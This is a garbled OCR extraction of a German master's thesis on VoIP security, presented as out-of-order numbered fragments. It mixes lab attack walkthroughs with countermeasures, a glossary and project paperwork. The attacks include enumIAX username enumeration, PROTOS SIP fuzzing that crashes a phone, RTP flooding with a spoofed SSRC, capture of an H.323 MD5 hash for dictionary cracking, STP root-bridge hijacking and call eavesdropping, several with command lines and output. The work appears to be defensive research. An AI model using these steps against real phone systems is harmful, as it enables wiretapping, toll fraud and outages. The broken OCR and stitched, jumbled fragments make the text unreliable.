152. al ist ein Programm zur Analyse von Netzwerk Kommunikationsverbindungen X Lite ist eine VoIP Freeware von CounterPath Solutions Inc fr her Xten Networks Inc welche es jedem Nutzer erm glicht Telefongespr che ber das Internet von PC zu PC von PC zum Festnetz und vom Festnetz zum PC zu f hren Einige VoIP Provider stellen Ihren Kunden ein vorkonfiguriertes X Lite zur Verf gung Yersinia ist ein Netzwerk Werkzeug das entworfen wurde um die Sicherheit verschiedener Netzwerk Protokolle zu testen Es diesnt als solide Grundlage f r die Analyse und Pr fung der eingesetzten Netzwerke und Systeme Mittels Yersinia lassen sich aber auch zahlreiche Netzwerk Angriffe ausf hren 19 02 2009 Berner Fachhochschule Technik und Informatik Software Schule Schweiz http de wikipedia org wiki User_Ag ent http de wikipedia org wiki User_Da tagram_Protocol http de wikipedia org wiki Verf C3 BCgbarkeit http de wikipedia org wiki Vertrauli chkeit http de wikipedia org wiki VLAN http www voipsa org http de wikipedia org wiki Wireshar k http de wikipedia org wiki X Lite http www yersinia net S Sch r MAS 06 02 20 Seite 206 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 14 Anhang 14 1 Pflichtenheft Pflichtenheft MAS 06 02 20 VOIP Security Diplomarbeit Bern November 2008 Version 1 0 Status Freigegeben Verfasser Stefan Sch r
153. alle Gespr che die innerhalb dieser Dom ne gef hrt werden Schutz gegen Angriff Analyse Nicht verwenden der Well Kown Ports 5060 von SIP Da jedoch die gebrauchten Ports in Klartext bertragen werden und mit jedem Netzwerkmonitor aufgezeichnet werden k nnen ist dies nur ein bedingter Schutz Authentifizierung f r die BYE Nachrichten auf den SIP Proxy Servern einschalten und mit sicheren Passw rtern arbeiten Somit ist ein Senden einer BYE Nachricht an den SIP Proxy Server nur m glich wenn der Angreifer im Besitze des Passwortes ist BYE Nachrichten k nnen aber immer noch direkt an den User Agent gesendet werden Somit ist die Authentifizierung nur ein bedingter Schutzmechanismus Siehe Massnahmen Authentisierung von SIP Nachrichten Kapitel 8 1 2 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Siehe Massnahmen TLS und SIP Kapitel 8 1 4 Siehe Massnahmen IPSec und SIP Kapitel 8 1 5 Kommentar SiVuS ist ein m chtiges Tool dass verschiedenste Scanner Funktionen f r verschiedene Protokolle wie SIP MGCP H 323 und RTP Ebenfalls bietet das Tool die M glichkeit SIP Meldungen zu generieren und diese gegen ein Angriffsziel einzusetzen sowie deren Antwortpakete zu protokollieren Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 68 Berner Fachhochschule Technik und Informatik Software Schule Schweiz 2 11 2 Technik und Funktionsweise Der Angreifer beabsichtigt die Registrierung
154. angaben Titel der Arbeit VOIP Security Nummer MAS 06 02 20 Dstum Ststusbericht Montag 20 Oktober 2008 Projektbeteiligte Auftraggebe Selbsteingebrsachtes Thems Berever Kurt J rmenn Aastra Telecom Schweiz AG Experte Mathiss Engel Csssarius AG Diplomand Autor Ststusbericht Stefan Schar Asstra Telecom Schweiz AG Zusammenfassung IST Begr ndung SE Erstellung Fflichtenheft weit foriges chritten sy ing Sehr genaue Definitionen der Aufgaben angestrebt Guter Fortschritt Aufbau der Testumgebung in unmittelbarer Aussicht nde IST Situation Legende Tendenz suf Kurs Verbsserung vom Kurs leicht gleich bleibend sbgewichen Verschlechterung stark vom Kurs abgewichen bersicht der Arbeiten Abgeschlossene Arbeiten Laufende offene Erstellung Pflichtenheft Arbeiten Die Erstellung des Pflichtenheftes ist schon weit forigss chritten jedoch bedarf es noch diverser Abk l rungen betreffend der einzusetzenden Analyse und Angrifftools Auch steht die berarbeitung betreffend den Details und Feinarbeiten noch aus Evsluierung der einzusetzenden Analyse und Angriffioot Die meisten Tools sind bereits bestimmt es wird jedoch noch der Einsatz weiterer Tools gepr ft Evaluierung der zu untersuchenden Protokolle Die zu testenden Protokolle sind weitgehend bestimmt Organs stion Material f r Testumgebung Msteris zum Aufbau einer weiteren Testumgebung wird zur Zeit organi
155. ankommende H 323 Anrufe gewartet wird Auch mit den Scannresultaten wird die MAC Adresse des gefundenen Endpoints ausgegeben KKK Interesting ports on 10 1 1 151 PORT STATE SERVICE 1718 tcp closed unknown 1719 tcp closed unknown 1720 tcp open H 323 Q 931 1731 tcp closed unknown MAC Address 00 1C C0 07 F3 50 Intel Corporate Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 106 oo Berner Fachhochschule teem Technik und Informatik Software Schule Schweiz 4 2 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Von diesem Angriff selbst gehen nicht so grosse Gefahren aus Der Angreifer kommt lediglich in Kenntnis von vorhandnen Endpoints deren IP und MAC Adresse sowie der vorhandenen Gatekeeper Diese Attacke selbst sollte jedoch nicht als allzu harmlos gesehen werden Eine Enumeration ist meist der Anfang weiterer Attacken mit welcher sich der Angreifer einen ersten berblick potentieller Angriffsziele verschafft Mit dem Wissen der g ltigen Benutzer Konten kann der Angreifer gezielte weitere Angriffe starten Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 107 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 4 3 1 Password Retrieval H 323 against MD5 niegrit t ee Vertraulichkeit x Eingesetztes Tool Verf gb
156. ant halten Angriffs PC Applikations PC PBX VOIP SIP Endger te Aufwand untersch tzt Mittel Hoch Die w chentliche Arbeitszeit muss entsprechend ausgedehnt werden Technologie untersch tzt Klein Hoch Hilfe bei Fachexperten aus dem beruflichen Umfeld suchen Datenverlust Mittel Hoch Datensicherung auf dediziertes Laufwerk nach jedem Arbeitstag 5 Bewertung Notenberechnung Die Note wird nach ECTS Grades vergeben Die Note F ist ungen gend die Noten E bis A sind gen gend A ist die beste Note Der ECTS Grade wird wie folgt aus den Kriteriengewichten gi den maximalen Punkten mi den erreichten Punkten pi und dem Erfolg e wie folgt berechnet mesis D g pilm g i Kriterium Thesis Prasentation p jl m j Pr sentationskriterium 2 gesamt 0 92 Tesis 0 1 Prasentation e sant lt 0 5 Note F e sam 20 5 Note E e ysam 20 6 Note D e sam 20 7 Note C sam 0 8 Note B e samt 20 9 Note A Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 221 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz 6 Abnahme Die in diesem Pflichtenheft aufgef hrten Vorhaben und Ziele entsprechen den Anforderungen gem ss der Eingabe der Master Thesis Daher beantrage ich die Freigabe des Pflichtenheftes und somit auch der Diplomarbeit Mit der Unterzeichnung dieses Dokumentes bekunden die beteiligten Parteien dass sie mit dem Inhalt dieses Pflichtenhefte
157. arkeit x Brute Force Downloadlink Quelle des Tools Schweregrad 1 leicht 6 schwer Hinweise zu Installation Verf gbarkeit Installation Tool a Anwendung Tool Siehe Kommentar Erforderliche Vorkenntnisse 4 Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 5 Ziel Angriff Analyse H 323 unterst tzt folgende drei verschiedene Authentifizierungen der Endpoints Symmetric encryption Password Hashing MD5 und Public Key Verfahren Die letzte Variante wird infolge des hohen Handling Aufwandes der Schl sselverteilung public key sehr selten eingesetzt obwohl sie die sicherste Authentifizierungs Methode w re Die MD5 Authentifizierung bietet auch nur dann einen wirksamen Schutz wenn sichere Passw rter verwendet werden Bei der Symmetric encryption wird ein shared Secret zwischen Endpoint und Gatekeeper eingesetzt Ziel des Angreifers ist es an Passw rter und die dazugeh rigen Benutzerkonten zu kommen Einmal im Besitz dieser Angaben kann der Angreifer ein eignes Telefon mit den falschen Benutzerkonten an das Netzwerk anschliessen Dadurch wird die Registrierung des zuvor im Netzwerk vorhandenen originalen User Agents gel scht Alle ankommenden Anrufe klingeln beim Angreifer Auch kann der Angreifer abgehende Gespr che mit falscher Identit t f hren Somit k nnen auch Gespr che auf Kosten anderer gef hrt werden
158. artet dass dieser mindestens mit der Performance und Rechenleistung seines Angriffziels ebenb rtig ist VMware Server kann unter folgendem Link kostenlos herunter geladen werden http www vmware com download server Es wird erwartet dass sich der Benutzer dabei registriert um einen g ltigen Lizenzschl ssel zu erhalten Es sei nochmals erw hnt diese Registrierung ist absolut geb hrenfrei Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 18 e0 oo Berner Fachhochschule Technik und Informatik Software Schule Schweiz Nach dem Download kann die Installation mittels Doppelklick auf das File vmware server exe gestartet werden Mittels next wird der n chste Installationsschritt eingeleitet i vMware Server xi g ca Welcome to the Installation Wizard for 4 f a VWMiware Server wis A The installation wizard will install Mware Server on your computer To continue click Next VMware Server WARMING This program is protected by copyright law and international treaties fe YMware Server License Agreement Please read the Following license agreement carefully NOTICE BY DOWNLOADING AND INSTALLING COPYING OR OTHERWISE USING THE SOFTWARE YOU AGREE TO BE BOUND BY THE TERMS OF THIS VMWARE MASTER END USER LICENSE AGREEMENT EULA IF YOU DO NOT AGREE TO THE TERMS OF THIS EULA YOU MAY NOT DOWNLOAD INSTALL COPY OR USE THE SOFTWARE AND YOU MAY RETURN THE UNUSED SOFT
159. azaaaaaaaaaaaaa IPA 127 0 0 BS Jan 4 17 52 30 WARNING 1516 chan sip c 1229 retrans pkt Maximum retries exceeded on transmission 3237 localhost for seqno 1 Cri tical Response Jan 4 17 52 30 WARNDNG 1516 c annanannaanasananana IP4 127 0 8 Jan 4 17 52 30 WARHINGL 1516 cha tical Response o exe hat ein Problem festgestellt und muss x Jan 4 17 52 30 WARNING 1516 c beendet werden aunaaasaaaaaaaaaasaaaaaaanaaananne Jan 4 17 52 30 WARMINGLI1516 cha itical Response Asaaaanaaaaaasasasaraaaaasaraaa ission 3238 localhost for seqno 1 Cri aanaananannaaanaaaasasasasasaaaasaaaa 2 ission 323 localhost for seqno 1 Cr Falls Sie Ihre Arbeit noch nicht gespeichert hatten konnen Daten m glicherweise verloren gegangen sen Jan 4 17 52 30 WARNING 1516 ch Adaaasacscacaaanaasaaaaaaaaasaaeses aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Dieses Problem bitte auch an Microsoft besichten 1 1 Jan 4 17 52 30 WARMING 1516 ch Ein Problernbericht den Sie uns senden k nnen wurde erstelt Wir ission 3240Glocalhost for seqno 1 Cr itical Response werden diesen Bencht vertraulich und anonym bearbeiten Jan 4 17 52 30 WARNINELIS16 h Um zu sehen welche Daten Ihr Bericht enth lt Si a BAAAAAAABAAABAAAAAAAAAAAAAAAAAAABAAAA aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaan AaAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAT 448804444545845884880458640004546 Jan 4 17 52 30 WARNING 1516 ch Problembericht senden Nicht senden Untenstehend sind die durch Pro
160. b ad 96 Broadcast Frame 30 375 bytes on wire 375 bytes captured amp Ethernet II Src vmware_55 dd b4 00 0c 29 55 dd b4 Dst Aastra_19 93 a7 00 08 5d 19 93 a7 Address vmware_55 dd b4 00 0c 29 55 dd b4 aawa sana O aasa aaas cass oes IG bit Individual address unicast ween ne cee wees ner eee LG bit Globally unique address factory default Type IP 0x0800 User Agent 4119 beantwortet den Anruf als erstes User Agent 4111 klingelt weiter Zwischen User Agent 4129 und User Agent 4119 besteht jetzt zwar eine Verbindung jedoch sind die Gespr chskan le nicht korrekt durchgeschaltet Es sind nur Bruchst cke einzelner Worte zu h ren Nur ganz selten findet ein Sprachpaket den Weg zu User Agent 4119 63 25 201586 Netopia_21 79 14 CompalIn_0b ad 96 ARP 10 1 1 1 is at 00 0f cc 21 79 14 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 63 oo Berner Fachhochschule eee Technik und Informatik Software Schule Schweiz Sobald User Agent 4111 den H rer auch abhebt siehe Paket Nr 1101 besteht zwischen ihm und User Agent 4129 eine Gespr chsverbindung Mit dem Quittieren des User Agents 4129 in Paket Nr 1144 werden auch die Gespr chskan le sauber durchgeschaltet Es kann eine einwandfreie Kommunikation zwischen diesen User Agents 4111 und 4129 statt finden Sprachpakete werden nun auch an den User Agent 4111 gesendet 2 9 4 Folgende Auswirkungen und Gefahren f r das Angriff
161. bei seinem Angriff gef lschte BPDU Pakete mit sehr tiefen Pfadkosten und gibt sich somit als STP f higen Switch aus Dies bewirkt dass alle Datenpakete ber ihn gesendet werden und er sogar zur Root Bridge mutiert Dabei werden die redundanten Routen zwischen den Switches inaktiv geschaltet Dieser Angriff macht nur in einem Umfeld Sinn wo mehrere Switche ein redundantes Netzwerk bilden Der PC des Angreifers muss zwei Stk Netzwerkinterfaces und physikalischen Zugang Ethernet Anschl sse zu zwei verschiedenen Netzwerkelementen 2 Switche haben Diese Bedingung ist in der Regel nicht gegeben welches B ro hat schon Netzwerkanschl sse zweier verschiedener Switche Der Angreifer hat jedoch die M glichkeit einen Wireless Router an den Switch anzuschliessen von welchem er keinen physikalischen Anschluss keine Netzwerk Anschlussdose RJ45 hat Somit kann er w hrend dem Angriff die Daten von dem einen Netzwerkelement Switch ber seine Netzwerkkarte hinein und ber seine Wirelesskarte oder umgegehrt wieder hinaus zum anderen Netzwerkelement Switch senden Dabei zeichnet der Angreifer die Datenpakete auf welche er ber seinen PC leitet 6 4 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Damit der Angreifer die Daten ber seinen PC umleiten kann muss er zwei Netzwerkinterface haben Diese verbindet er zu einer Netzwerkbr cke indem er in den Netzwerkverbindungen von Microsoft beide markiert und dann via Kontextmen Netzwer
162. beschrankten Empfangerkreis vorgesehen zu sein Weitergabe und Ver ffentlichung sind nicht erw nscht Vertraulichkeit wird durch Rechtsnormen gesch tzt sie kann auch durch technische Mittel gef rdert oder erzwungen werden Ein VirtUser Agentl Local Area Network VLAN ist ein virtuelles lokales Netz innerhalb eines physischen Switches oder innerhalb eines gesamten Netzes Man unterscheidet die lteren portbasierten VLANs von paketbasierten tagged VLANs die fr her herstellerspezifisch implementiert waren und heute unter IEEE 802 1q standardisiert sind Abgek rzt wird diese Technik auch dot1q genannt vor allem im Cisco Umfeld Der Ausdruck Tagged leitet sich vom engl Ausdruck material tags das sind Warenanh nger mit denen Waren markiert werden ab Es handelt sich also bei tagged VLANs um Netzwerke die Netzwerkpakete verwenden welche eine VLAN Markierung tragen Die heute am weitesten verbreitete technische Realisierung von VLANs ist die im IEEE Standard 802 1Q definierte Voice over IP Security Alliance Von f hrenden Telekommunikations und Sicherheitsfirmen gegr ndete Sicherheitsallianz f r Internet Telefonie Voice over IP Die VOIPSA will das Bewusstsein f r m gliche Gefahren Hackerangriffe Netzwerkangriffe etc durch die Anwendung von VoIP sch rfen damit Anwender m glichst sicher Sprachdienste ber ihr IP Netz betreiben k nnen Wireshark engl wire Draht Kabel shark Hai alte Bezeichnung Ethere
163. bildet Im Registrations Request welcher an den H 323 Gatekeeper gesendet wird werden s mtliche Informationen in Klartext mitgesendet ausser dem Passwort Dies erlaubt es eine offline Dictionary Attacke gegen den MD5 Hashwert zu starten 4 33 Ausgangssituation Ablauf und Bedingungen f r Angriff Endpoint 4151 sendet einen Registration Request an den Gatekeeper Ob es sich hierbei um eine Registration oder eine per default eingestellte periodische Registration handelt spielt keine Rolle Der Angreifer horcht mittels Wireshark den Netzwerkverkehr ab und zeichnet den Registration Request des Endpoints 4151 auf Damit der Angreifer die im Netzwerk gesendeten Registration Requests empfangen kann muss die Bedingung gegeben sein in einem geswitchten Netzwerk Daten abhorchen zu k nnen Siehe Kapitel 1 4 Untenstehend ist der Registration Request des Endpoints 4151 in Paket Nr 19 zu sehen Folgende Informationen sind aus der Wireshark Aufzeichnung zu entnehmen User h323 ID user4151 timestamp Jan 26 2009 21 27 14 000000000 MD5 Hashwert 53FDF803EC14A7508EBD2F7BB 1984E68 Somit ist der Angreifer im Besitz aller notwendigen Daten um eine offline Dictionary Attacke starten zu k nnen Nachtr gliche Bemerkungen Abkl rungen mit einem Buchautor VOIP Hacking haben ergeben dass f r die offline Dictionary Attacke IAX Brute eingesetzt werden kann Infolge der sp ten Antwort dieses Buchautors konnte leider diese offline Dictionary Att
164. bindungsabbruch des aktuellen Gespr ches 5 4 3 Ausgangssituation Ablauf und Bedingungen f r Angriff User Agent 4111 und 4129 sind aktiv miteinander in einem Gespr ch Alle RTP Sprachpakete laufen w hrend der Verbindung immer ber den Asterisk Proxy Server Ziel des Angreifers ist es im Namen von User Agent 4129 den Asterisk Proxy Server zu flooden Damit der Angreifer das Netzwerk nach RTP Paketen abhorchen kann muss die Bedingung gegeben sein in einem geswitchten Netzwerk Daten abhorchen zu k nnen Siehe Kapitel 1 4 Bevor die gespooften RTP Pakete an das Angriffsziel gesendet werden k nnen muss ein Vorlage RTP Paket erstellt werden In diesem Vorlage RTP Paket muss die SSRC Nummer identisch mit der SSRC Nummer sein wie sie auch in den richtig empfangegen RTP Paketen des Angriffziels ist welche dieses vom seinem Gespr chspartner erh lt Diese SSRC Nummer ist in jedem von User Agent 4129 an den Asterisk Proxy Server gesendetem RTP Paket ersichtlich Um an diese SSRC Nummer zu kommen braucht der Angreifer lediglich mittels Wireshark die RTP Pakete aufzuzeichnen Die ersniffte SSRC Nummer wird mit einem Hexeditor integriertes Tool in BackTrack CD in das Vorlage RTP Paket iSEC RTP Flood DOS eingetragen Somit sehen die vom Angreifer gesendeten RTP Pakete aus als w rden sie von User Agent 4129 stammen filei root iSEC RTP Flood DOS KHexEdit file Edit View Documents Bookmarks Tools Settings Help y Y K I se amp 0p
165. chl sselung ausschliessen w rde Somit ist bez glich Integrit t und Vertraulichkeit die Sicherheit von SIP nicht vollst ndig gew hrleistet Bei der Registration der Terminals in SIP H 323 oder IAX sind auf sichere Passworter und eingeschaltete Authentifizierung zu achten MD5 Hashwerte mit unsicheren Passwortern sind innert wenigen Minuten via Dictionary Attacke geknackt Eine Authentifizierung wobei das Passwort und der Benutzername in Klartext ber das Netzwerk gesendet werden hat in einer sicheren VOIP Umgebung nichts verloren Dabei sind sehr oft seitens Ger tehersteller Soft oder Hardphone solche Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 195 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz Schutzmechanismen infolge Kostenreduzierung nicht implementiert Angriffe auf den Medienstrom also die RTP Pakete gelten zu den sehr lohnenswerten Zielen und sind mit relativ kleinem Aufwand zu bewerkstelligen Aus Kostengriinden unzureichender Performance der Terminals und verz gerungstechnischen Problemen der RTP Pakete bei der Verschl sselung fehlen heute noch bei den meisten Ger teherstellern Implementationen welche eine Verschl sselung des Medienstromes zulassen Somit ist es f r einen Angreifer der einmal Zugang zum Netzwerk erlangt hat ein kleines den Medienstrom aufzuzeichnen und als Audiodatei wiederzugeben Mit dem steigenden Sicherheitsbewusstsein und den immer leis
166. cted 2 VoIP Calls Selected 1 Call Start Time Stop Time Initial Speaker From Protocol Packets State 8 597 12 362 10 1 1 101 sip 4111 10 1 1 101 sip 4129 10 1 1 129 5060 SIP IN CALL if m Total Calls 2 Start packets 0 Completed calls 0 Rejected calls 0 Prepare Filter Graph Player Select All Im Fenster RTP Player ist die Deodierung mittels Mausklick auf den gleichnamigen Button zu best tigen Pause Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 119 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz Es startet automatisch der RTP Player von Wireshark Mittels Auswahlbox kann die Tonspur gew hlt werden welche wiedergegeben werden soll Werden beide Tonspuren ausgew hlt so kann das Gespr ch so angeh rt werden wie es live in der aufgezeichneten Kommunikation auch stattfand E Trace pcap VoIP RTP Player _ p lola om 10 1 1 101 14616 to 10 1 1 121 3000 Duratio Jitter buffer ms 50 Decode Play Pause Stop Close 5 2 6 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Der Angreifer kommt in Kenntnis des gesamten Gespr chsinhaltes der Kommunikation Je nach Angriffsziel und Gespr chsinhalt kann dies verheerende und kostspielige Folgen haben Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 120 Berner Fac
167. d ganz spezifisch ein Dictionary File zusammen stellen So sind die zu eruierenden g ltigen Benutzerkonten innert sehr kurzer Zeit durch das Tool ermittelt Zus tzlich kann noch davon ausgegangen werden dass die meisten Rufnummernpl ne einer KMU PBX im 3 oder 4 stelligen Bereich liegen Der Angriff funktioniert auch im geswitchten Netzwerk ohne dass dazu zuerst spezielle Bedingungen siehe Kapitel 1 4 geschaffen werden m ssen Untenstehender Angriff zeigt dass der User Name 4131 ermittelt werden konnte Krk bt enumiax 1 0 enumiax v d dict 10 1 1 101 enumlAX 1 0 Dustin D Trammell lt dtrammell tippingpoint com gt Target Aquired 10 1 1 101 Connecting to 10 1 1 101 via udp on port 4569 Starting enum process at Mon Jan 19 21 05 07 2009 HAAR EEE Trying username 3344 HAE EEE EEE Trying username 2254 HEAP EEE AE EEA Trying username susi E RHEE H HE HHHH HHHH HEHHEHE Trying username bernd PEHA HEHHEHE HHEH HEHHEHE HEHHEHE Trying username 1234 PE RHE H HHEH HHHH HHHH HHHH Trying username 4321 PEHE REEE HEHHEHE HEE HEHEHEHEHE EHEHEHEH Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 86 TT Found al username 4131 a Mon Jan 19 21 05 12 2009 HEH EHEHEHEH HEHEHEHEH HEHHEHE Trying username 5566 ARE Trying username test ARE HEHEHEHEH HEHEHEH HEER HEHHEHE Trying username password HEHE Trying username pass A AA AE EEE AEE Trying username admi
168. d auf ein Response vom Angriffsziel gewartet start 1 gt gt Sagt aus bei welchem Test Case begonnen werden soll Im Ganzen gibt es 4527 Test Cases welche ohne spezielle Angaben beim Starten alle nacheinander zum Angriffsziel gesendet werden Untenstehend ist zu sehen wie das Terminal des Angriffszieles auf den Test Case 1674 keinen Response auf die INVITE Nachricht zur cksendet S Das Tool verdoppelt jeweils mit dem Ausbleiben der Response Nachricht die Wartezeit bis es nochmals versucht mit dem senden derselben Nachrichten eine Response Antwort vom Angriffsziel zu erhalten Diese bleibt jedoch aus Somit kann die Aussage gemacht werden das Terminal des Angriffszieles ist abgest rzt oder befindet sich in einem instabilen Zustand der Angriff ist gelungen kkk bt protos voip java jar c07 sip r2 jar touri 4129 10 1 1 101 fromuri 4111 10 1 1 101 teardown sendto 10 1 1 129 dport 5060 validcase start 1 single valued java class path using it s value for jar file name reading data from jar file c07 sip r2 jar Sending valid case test case 0 445 bytes Received Returncode 486 Sending CANCEL test case 0 224 bytes Received Returncode 481 Sending ACK test case 0 218 bytes Received Returncode 486 Received Returncode 486 Sending valid case test case 1672 453 bytes test case 1672 No reply to valid INVITE packet within 100 ms Retrying test case 1672 453 bytes Diplomarbeit VOIP Security 19 0
169. d so unerreichbar werden zu lassen DoS Denial of Service Fehlende Sicherheitsimplementierungen seitens der Ger tehersteller Soft oder Hardphones unterst tzen oft diese Angriffsm glichkeit 3 1 1 IAX Header Das IAX2 Protokoll kennt zwei Header Einen 12 Byte grossen Fullheader und einen 4 Byte grossen Miniheader Der Fullheader dient der Signalisierung und im Miniheader werden die Nutzdaten transportiert Der Miniheader wird f r die effiziente Kommunikation zwischen den Endpoints eingesetzt und ist auf maximal 32 KByte begrenzt 1 1 1 N N N 1 1 N N N 1 1 N N 1 1 11 1 1 1 1 1 1 1 Fr Source Call Number R Destination Call Number Timestamp OSeqno ISeqno Frame Type Cc Subclass Data Quelle Bild http www en voipforo com IAX IAX frames php Bedeutung der Felder des AX Fullheaders F Full Frame Indikator Source Call Number Identit tsnummer des Senders R Wenn R 1 retransmitted wenn R 0 initialtransmission Destination Call Number Identit tsnummer des Empf ngers Timestamp Zeitstempel OSeqno Sequenznummer des Outboundstreams beginnt immer bei 0 ISeqno Sequenznummer des Inboundstreams beginnt immer bei 0 Frame Type Beschreibt Art des Paketes ZBsp VOICE DTMF IAX VIDEO TEXT C Wenn C 1 power of two wenn C 0 einfacher 7 bit Integer Wert Subclass Steuerfunktionsparameter wie ACK HANGUP NEW PING Data Nutzdaten Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 83 oo
170. dene Plug ins zum Testen bekannter Schwachstellen an Zus tzlich verf gt er ber die M glichkeit pr parierte SIP Nachrichten zu verschicken und die Antwortpakete tz protokollieren http www heise de security tools Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 204 Sniffer Sniffing Social Engeneering Softphone Spoofing SRTP SSRC Nummer bei RTP sTerm STP Switch SYN Flood TCP TLS Diplomarbeit VOIP Security Ein Sniffer engl to sniff f r riechen schn ffeln ist eine Software die den Datenverkehr eines Netzwerks empfangen aufzeichnen darstellen und ggf auswerten kann Es handelt sich also um ein Werkzeug der Netzwerkanalyse Social Engineering engl eigentlich angewandte Sozialwissenschaft auch soziale Manipulation nennt man zwischenmenschliche Beeinflussungen mit dem Ziel unberechtigt an Daten oder Dinge zu gelangen Social Engineers spionieren das pers nliche Umfeld ihres Opfers aus t uschen falsche Identit ten vor oder nutzen Verhaltensweisen wie Autorit tsh rigkeit aus um Dinge wie geheime Informationen oder unbezahlte Dienstleistungen zu erlangen Meist dient Social Engineering dem Eindringen in ein fremdes Computersystem um vertrauliche Daten einzusehen man spricht dann auch von Social Hacking Ein Softphone ist ein Computerprogramm das Telefonie erm glicht Spoofing englisch zu deutsch Manipulation Verschleierung oder Vort usc
171. der Begriff Multi Port Bridge benutzt Ein SYN Flood ist eine Form von Denial of Service Attacken auf Computersysteme Der Angriff verwendet den Verbindungsaufbau des TCP Transportprotokolls um einzelne Dienste oder ganze Computer aus dem Netzwerk unerreichbar zu machen Das Transmission Control Protocol TCP zu dt bertragungssteuerungsprotokoll ist eine Vereinbarung Protokoll dar ber auf welche Art und Weise Daten zwischen Computern ausgetauscht werden sollen Alle Betriebssysteme moderner Computer beherrschen TCP und nutzen es f r den Datenaustausch mit anderen Rechnern Das Protokoll ist ein zuverl ssiges verbindungsorientiertes paketvermittelndes Transportprotokoll in Computernetzwerken Es ist Teil der Internetprotokollfamilie der Grundlage des Internets Transport Layer Security TLS oder Secure Sockets Layer SSL ist ein hybrides Verschl sselungsprotokoll zur Daten bertragung im Internet TLS 1 0 1 1 und 1 2 sind die standardisierten Weiterentwicklungen von SSL 3 0 TLS 1 0 steht neu f r SSL 3 1 SSL wird also nun unter dem Namen TLS weiterentwickelt Hier wird die Abk rzung SSL f r beide Bezeichnungen verwendet 19 02 2009 Berner Fachhochschule Technik und Informatik Software Schule Schweiz http de wikipedia org wiki Sniffing http de wikipedia org wiki Social_E ngineering http de wikipedia org wiki Softphon e http de wikipedia org wiki Spoofing http de wikipedia org wiki SRTP
172. det wurden Vergleicht man die IP ID des obigen Angriffslogs mit dem Identification Eintrag des untenstehenden Wiresharktraces stellt man fest dass es sich dabei um dasselbe Paket mit der ID 48060 handelt Ansonsten ist nicht festzustellen dass dieses Paket vom Angreifer stammt Nemesis sendet bei diesem Angriff f r jeden Programm Aufruf jeweils nur 1 Paket Damit der Angriff seine volle Wirkung erzielt muss nur noch ein kleines Skript geschrieben werden der diesen Befehl fortlaufend aufruft Im Rahmen dieser Diplomarbeit reichte die verbleibende Zeit leider nicht mehr aus um dieses Skript zu erstellen Eilter v Expression Clear Apply No Time Source Destination Protocol Info 2764 13 539988 10 1 1 129 10 1 1 101 JDP source port 14750 Destinatior Le Cre v Kin Frame 2764 214 bytes on wire 214 bytes captured Ethernet II Src Aastra_19 93 a7 00 08 5d 19 93 a7 Dst Dell_f0 22 43 00 14 22 f0 22 43 Internet Protocol Src 10 1 1 129 10 1 1 129 Dst 10 1 1 101 10 1 1 101 version 4 Header length 20 bytes Differentiated Services Field 0x00 DSCP 0x00 Default ECN 0x00 Total Length 200 Identification Oxbbbc 48060 a 0000 00 14 22 fO 22 43 00 08 5d 19 93 a7 08 00 45 00 0010 00 c8 bb bc 00 00 ff 11 e8 80 Oa 01 01 81 Oa OL 0020 01 65 39 9e 39 9e 00 b4 b2 51 80 00 18 23 2f 1d 0030 8e 8d 5d 19 93 a7 e9 ea d4 dO ec 5c 51 7b cd d5 0040 5d ef db f3 72 e6 d9 7e 6c 75 62
173. dge sind Switches werden auch als Multiport Bridges bezeichnet Die Pakete dieses Protokolls werden Bridge Protocol Data Unit BPDU genannt Sie werden im Datenfeld eines Ethernet Datenpaketes Ethernet Frame per Broadcast an die benachbarten Switche versendet Die Brute Force Methode engl f r Methode der rohen Gewalt auch Exhaustionsmethode von lat exhaurire aussch pfen ist eine L sungsmethode f r Probleme aus den Bereichen Informatik Kryptologie und Spieltheorie die auf dem Ausprobieren aller oder zumindest vieler m glichen F lle beruht Cain amp Abel ist laut dem Entwicklerteam unter Massimiliano Montoro ein Passwort Recovery Tool fiir Microsoft Windows ist aber eher ein Multifunktionswerkzeug Es erlaubt das einfache Auslesen aller Passw rter die im Browser gespeichert wurden au erdem das Cracking verschl sselter Passw rter Hashes mit Hilfe von W rterb chern Brute Force und Rainbow Tables sowie das Aufzeichnen von Passw rtern und VoIP Unterhaltungen im Netz via ARP Spoofing Dadurch ist es ebenfalls in der Lage Man in the middle Angriffe gegen eine Reihe von SSL basierten Diensten und RDP durchzuf hren Das Challenge Response Verfahren bersetzt etwa Herausforderung Antwort Verfahren ist ein sicheres Authentifizierungsverfahren eines Teilnehmers auf Basis von Wissen Hierbei stellt ein Teilnehmer eine Aufgabe engl challenge die der andere l sen muss engl response um zu beweisen dass e
